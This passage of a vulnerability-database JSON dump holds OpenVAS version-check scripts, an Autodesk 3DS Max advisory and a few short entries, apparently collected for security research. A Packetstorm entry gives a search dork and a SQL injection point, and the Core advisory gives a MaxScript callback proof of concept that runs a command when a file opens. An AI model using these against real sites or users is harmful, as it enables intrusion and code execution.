"http://plugins.openvas.org/nasl.php?oid=1361412562310107160", "title": "QuickHeal CVE-2015-8285 Denial of Service Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# QuickHeal CVE-2015-8285 Denial of 
Service Vulnerability\n#\n# Authors:\n# Tameem Eissa <tameem.eissa@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:quickheal:antivirus_pro\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.107160\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-05-02 10:28:58 +0200 (Tue, 02 May 2017)\");\n script_cve_id(\"CVE-2015-8285\");\n script_bugtraq_id(97996);\n\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_name(\"QuickHeal CVE-2015-8285 Denial of Service Vulnerability\");\n script_tag(name:\"summary\", value:\"QuickHeal is prone to a denial-of-service vulnerability.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The vulnerability exists in the driver webssx.sys.\");\n script_tag(name:\"impact\", value:\"An attacker can exploit this issue to cause 
denial-of-service condition.\");\n script_tag(name:\"affected\", value:\"QuickHeal 16.00 is vulnerable\");\n script_tag(name:\"solution\", value:\"Updates are available. Please see the references or vendor advisory for more information.\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/97996\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n\n script_family(\"General\");\n\n script_dependencies(\"gb_quick_heal_av_detect.nasl\");\n script_mandatory_keys(\"QuickHeal/Antivirus6432/Pro/Installed\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\n\nif(!Ver = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_equal(version: Ver, test_version:\"16.00\"))\n{\n report = report_fixed_ver(installed_version:Ver, fixed_version:\"See information supplied by the vendor\");\n security_message(data:report);\n exit( 0 );\n}\n\nexit ( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:35:39", "bulletinFamily": "scanner", "description": "This host is installed with Symantec\n Symantec Workspace Streaming and is prone to an information disclosure\n vulnerability.", "modified": "2018-11-21T00:00:00", "published": "2016-07-18T00:00:00", "id": "OPENVAS:1361412562310808586", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808586", "title": "Symantec Workspace Streaming Information Disclosure Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_symantec_workspace_streaming_info_disc_vuln.nasl 12455 2018-11-21 09:17:27Z cfischer $\n#\n# Symantec Workspace Streaming Information Disclosure Vulnerability\n#\n# Authors:\n# Tushar Khelge <tushar.khelge@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, 
http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:symantec:workspace_streaming\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808586\");\n script_version(\"$Revision: 12455 $\");\n script_cve_id(\"CVE-2014-1649\");\n script_bugtraq_id(67189);\n script_tag(name:\"cvss_base\", value:\"7.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-21 10:17:27 +0100 (Wed, 21 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-07-18 17:09:19 +0530 (Mon, 18 Jul 2016)\");\n script_name(\"Symantec Workspace Streaming Information Disclosure Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Symantec\n Symantec Workspace Streaming and is prone to an information disclosure\n vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to symantec workspace\n streaming server does not properly handle incoming HTTPS XMLRPC requests.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation allows remote\n attackers to execute arbitrary code on the server and 
create an unauthorized\n access point on the server.\");\n\n script_tag(name:\"affected\", value:\"Symantec Workspace Streaming before 7.5.0.749.\");\n\n script_tag(name:\"solution\", value:\"Update Symantec Workspace Streaming version 7.5.0.749\n and later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"http://zerodayinitiative.com/advisories/ZDI-14-127\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"gb_symantec_workspace_streaming_detect.nasl\");\n script_mandatory_keys(\"Symantec/Workspace/Streaming/Agent/Win6432/Installed\");\n script_xref(name:\"URL\", value:\"https://support.symantec.com/\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!sepVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:sepVer, test_version:\"7.5.0.749\"))\n{\n report = report_fixed_ver(installed_version:sepVer, fixed_version:\"7.5.0.749\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 7.9, "vector": "AV:A/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-13T20:21:44", "bulletinFamily": "scanner", "description": "This host is installed with Python and is prone to buffer overflow\n vulnerability.", "modified": "2019-11-12T00:00:00", "published": "2014-03-05T00:00:00", "id": "OPENVAS:1361412562310804322", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804322", "title": "Python 'socket.recvfrom_into' Buffer Overflow Vulnerability Mar14 (Windows)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Python 'socket.recvfrom_into' Buffer Overflow Vulnerability Mar14 (Windows)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone 
Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:python:python\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804322\");\n script_version(\"2019-11-12T13:34:01+0000\");\n script_cve_id(\"CVE-2014-1912\");\n script_bugtraq_id(65379);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-11-12 13:34:01 +0000 (Tue, 12 Nov 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-03-05 12:18:28 +0530 (Wed, 05 Mar 2014)\");\n script_name(\"Python 'socket.recvfrom_into' Buffer Overflow Vulnerability Mar14 (Windows)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"gb_python_detect_win.nasl\");\n script_mandatory_keys(\"python/win/detected\");\n\n script_xref(name:\"URL\", value:\"http://bugs.python.org/issue20246\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/56624\");\n script_xref(name:\"URL\", value:\"http://pastebin.com/raw.php?i=GHXSmNEg\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/31875\");\n 
script_xref(name:\"URL\", value:\"http://www.securitytracker.com/id/1029831\");\n script_xref(name:\"URL\", value:\"http://www.python.org/download/\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Python and is prone to a buffer overflow\n vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to a boundary error within the 'sock_recvfrom_into' function.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a remote attacker to cause a buffer\n overflow, resulting in a denial of service or potentially allowing the execution of arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Python version 2.5 before 2.7.7 and 3.x before 3.3.4\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Python version 2.7.7, 3.3.4 or later.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\npyVer = infos['version'];\npypath = infos['location'];\n\nif(version_in_range(version:pyVer, test_version:\"2.5\", test_version2:\"2.7.6150\")||\n version_in_range(version:pyVer, test_version:\"3.0\", test_version2:\"3.3.3150\")){\n report = report_fixed_ver(installed_version:pyVer, fixed_version:\"2.7.7/3.3.4\", install_path:pypath);\n security_message(data:report);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-11-03T10:19:36", "bulletinFamily": "exploit", "description": "", "modified": "2012-03-11T00:00:00", "published": "2012-03-11T00:00:00", "href": "https://packetstormsecurity.com/files/110665/SRISMS-SQL-Injection.html", "id": "PACKETSTORM:110665", "type": "packetstorm", "title": "SRISMS SQL Injection", 
"sourceData": "`\n[ SRISMS - SQL Injection Vulnerability ] \n \n[x] Author : the_cyber_nuxbie \n[x] Home : www.thecybernuxbie.com \n[x] E-mail : staff@thecybernuxbie.com \n[x] Found : 10 March 2012 @ 08:25 PM. \n[x] Tested : Back|Track 5. 
\n[x] Dork : inurl:\"/searchviewdetails.php?id=\" \n________________________________________________________________________ \n************************************************************************ \n \n- Info WebApps: \nThis Content WebApps Develop By: http://www.srisms.com/webdesigning.html \n \n- Exploit Report: \nhttp://localhost/WebApps/searchviewdetails.php?id=[SQL Injection] \n \n- Sample WebApps Vuln SQLi: \n \n0day no more... \n\"n0 d0rk f0r k1dd10ts\" \n 
\n \nMe @ March, 10 2012, GMT +08:25 Solo Raya, Indonesian. \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/110665/srisms-sql.txt"}], "coresecurity": [{"lastseen": "2017-01-13T17:00:46", "bulletinFamily": "info", "description": "Core Security - CoreLabs\n\nAutodesk 3DS Max Application Callbacks Arbitrary Command Execution\n\n### 1\\. Advisory Information\n\n**Title: **Autodesk 3DS Max Application Callbacks Arbitrary Command Execution \n**Advisory Id: **CORE-2009-0909 \n**Advisory URL: **[http://www.coresecurity.com/content/3dsmax-arbitrary-command-execution](<3dsmax-arbitrary-command-execution>) \n**Date published: **2009-11-23 \n**Date of last update: **2009-11-20 \n**Vendors contacted: **Autodesk \n**Release mode: **User release\n\n### 2\\. Vulnerability Information\n\n**Class: **Failure to Sanitize Data into a Different Plane [[CWE-74](<http://cwe.mitre.org/data/definitions/74.html>)] \n**Impact: **Code execution \n**Remotely Exploitable: **Yes \n**Locally Exploitable: **No \n**Bugtraq ID: **[36634](<http://www.securityfocus.com/bid/36634>) \n**CVE Name: **[CVE-2009-3577](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-3577>)\n\n### 3\\. Vulnerability Description\n\nAutodesk 3D Studio Max [2] is a modeling, animation and rendering package widely used for video game, film, multimedia and web content development. The software provides a built-in scripting language, allowing users to bind custom code to actions performed in the application. Execution of scripting code does not require explicit permission from the user. This mechanism can be exploited by an attacker to execute arbitrary code by enticing a victim to open a .max file with MaxScript application callbacks embedded.\n\n### 4\\. 
Vulnerable packages\n\n * Autodesk 3DSMax 2010\n * Autodesk 3DSMax 2009\n * Autodesk 3DSMax 2008\n * Autodesk 3DSMax 9\n * Autodesk 3DSMax 8\n * Autodesk 3DSMax 7\n * Autodesk 3DSMax 6\n\n### 5\\. Vendor Information, Solutions and Workarounds\n\nThe vendor did not provide fixes or workaround information.\n\nYou can disable the automatic loading of embedded MaxScript by following these steps:\n\n * Go to Customize menu > Preferences > Preference Settings dialog > MAXScript.\n * Uncheck \"Load/Save Scene Scripts\".\n * Uncheck \"Load/Save Persistent Globals\".\n\n### 6\\. Credits\n\nThis vulnerability was discovered and researched by Sebasti\u00e1n Tello from Core Security Technologies during Bugweek 2009 [1].\n\nThe publication of this advisory was coordinated by Fernando Russ from Core Security Advisories Team.\n\n### 7\\. Technical Description / Proof of Concept Code\n\nAutodesk 3D Studio Max provides a built-in scripting language called MaxScript, which can be used to automate repetitive tasks, combine existing functionality in new ways, develop new tools and user interfaces and much more. Max allows users to bind MaxScript to application callbacks in a way that could be exploited by an attacker to execute arbitrary code by enticing a victim to open a .max file with MaxScript application callbacks embedded.\n\nA Proof of Concept file can be obtained by following these simple steps. Open Max, press F11 (MaxScript Listener), and paste this code:\n \n \n callbacks.addScript #filePostOpen (\"DOSCommand(\\\"calc.exe\\\")\") id:#mbLoadCallback persistent:true \n \n\n### 8\\. 
Report Timeline\n\n * **2009-08-25: **Core Security Technologies asks the Autodesk Assistance Team for a security contact to report the vulnerability.\n * **2009-09-22: **Core asks the Autodesk Assistance Team for a security contact to report the vulnerability.\n * **2009-10-09: **Core contacts CERT to obtain security contact information for Autodesk.\n * **2009-10-16: **CERT acknowledges the communication.\n * **2009-10-19: **CERT sends their available contact information for Autodesk.\n * **2009-10-19: **Core notifies Autodesk of the vulnerability report and announces its initial plan to publish the content on November 2nd, 2009. Core requests an acknowledgement within two working days and asks whether the details should be sent encrypted or in plaintext.\n * **2009-10-19: **Autodesk acknowledges the report and requests the information to be provided in encrypted form.\n * **2009-10-20: **Core sends draft advisory and steps to reproduce the issue.\n * **2009-10-27: **Core asks Autodesk about the status of the vulnerability report sent on October 20th, 2009.\n * **2009-10-27: **Autodesk acknowledges the communication indicating that the pertinent Product Managers have been informed and are formulating a response.\n * **2009-11-06: **Core notifies Autodesk about the missed deadline of November 2nd, 2009 and requests a status update. Publication of CORE-2009-0909 is re-scheduled to November 16th, 2009 and is subject to change based on concrete feedback from Autodesk.\n * **2009-11-23: **Given the lack of response from Autodesk, Core decides to publish the advisory CORE-2009-0909 as \"user release\".\n\n### 9\\. References\n\n[1] The author participated in Core Bugweek 2009 as a member of the team \"Gimbal Lock N Load\". \n[2] [http://usa.autodesk.com/adsk/servlet/pc/index?id=13567410&siteID=123112](<http://usa.autodesk.com/adsk/servlet/pc/index?id=13567410&siteID=123112>)\n\n### 10\\. 
About CoreLabs\n\nCoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: <http://www.coresecurity.com/corelabs>.\n\n### 11\\. About Core Security Technologies\n\nCore Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at <http://www.coresecurity.com>.\n\n### 12\\. Disclaimer\n\nThe contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.\n\n### 13\\. 
PGP/GPG Keys\n\nThis advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at /legacy/files/attachments/core_security_advisories.asc.\n", "modified": "2009-11-20T00:00:00", "published": "2009-11-23T00:00:00", "href": "https://www.coresecurity.com/content/3dsmax-arbitrary-command-execution", "id": "CORE-2009-0909", "type": "coresecurity", "title": "Autodesk 3DS Max Application Callbacks Arbitrary Command Execution", "cvss": {}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:27", "bulletinFamily": "software", "description": "Buffer overflow on oversized thirst argument.", "modified": "2007-09-17T00:00:00", "published": "2007-09-17T00:00:00", "id": "SECURITYVULNS:VULN:8160", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:8160", "title": "Microsoft Foundation Classes FindFile buffer overflow", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}